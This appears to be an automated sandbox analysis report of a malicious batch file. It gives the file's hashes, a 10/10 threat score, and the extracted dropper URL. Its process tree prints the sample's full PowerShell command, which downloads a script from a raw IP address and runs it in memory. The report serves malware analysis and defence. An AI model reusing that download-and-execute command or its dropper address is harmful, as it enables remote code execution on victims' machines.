Analysis
max time kernel: 138s
max time network: 79s
platform: windows10_x64
resource: win10v200430
submitted: 02-06-2020 10:10
Static task: static1
Behavioral task: behavioral1
Sample: 421a8c43602d912fb7d54f525915eee9.bat
Resource: win7v200430
platform: windows7_x64
0 signatures
0 seconds
Behavioral task: behavioral2
Sample: 421a8c43602d912fb7d54f525915eee9.bat
Resource: win10v200430
platform: windows10_x64
0 signatures
0 seconds
General
Target: 421a8c43602d912fb7d54f525915eee9.bat
Size: 220B
MD5: c786b66ecefc50b20289a9d38575b5a2
SHA1: a1851402b42988ea349215149d3ca3b2890eb425
SHA256: bf0760cd225ed3fc4df18cf25a62e6f2f45c50f3e4726d258981e81b68e2bd65
SHA512: 3dc1d42fda27a8b7c9e3c2b32c957f19a619d035ed0609fea3181efac5c037e516b4184659e69fc0821db6fb56f68052f7a23248c05ddac25964357dd6193a77
Score: 10/10
Malware Config
Extracted
Language: ps1
Source
URLs
ps1.dropper: http://185.103.242.78/pastes/421a8c43602d912fb7d54f525915eee9
Signatures
Program crash (1 IoCs)
Processes: WerFault.exe
pid  pid_target  process       target process
864  504         WerFault.exe  powershell.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes: WerFault.exe
description                pid  process
Token: SeRestorePrivilege  864  WerFault.exe
Token: SeBackupPrivilege   864  WerFault.exe
Token: SeDebugPrivilege    864  WerFault.exe
Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes: WerFault.exe
pid  process
864  WerFault.exe
864  WerFault.exe
864  WerFault.exe
864  WerFault.exe
864  WerFault.exe
864  WerFault.exe
864  WerFault.exe
864  WerFault.exe
864  WerFault.exe
864  WerFault.exe
864  WerFault.exe
864  WerFault.exe
864  WerFault.exe
864  WerFault.exe
Processes
C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\421a8c43602d912fb7d54f525915eee9.bat"
  PID: 3656
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/421a8c43602d912fb7d54f525915eee9');Invoke-GIEGCPPTNOCAU;Start-Sleep -s 10000"
    PID: 504
    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 704
      Program crash
      Suspicious use of AdjustPrivilegeToken
      Suspicious behavior: EnumeratesProcesses
      PID: 864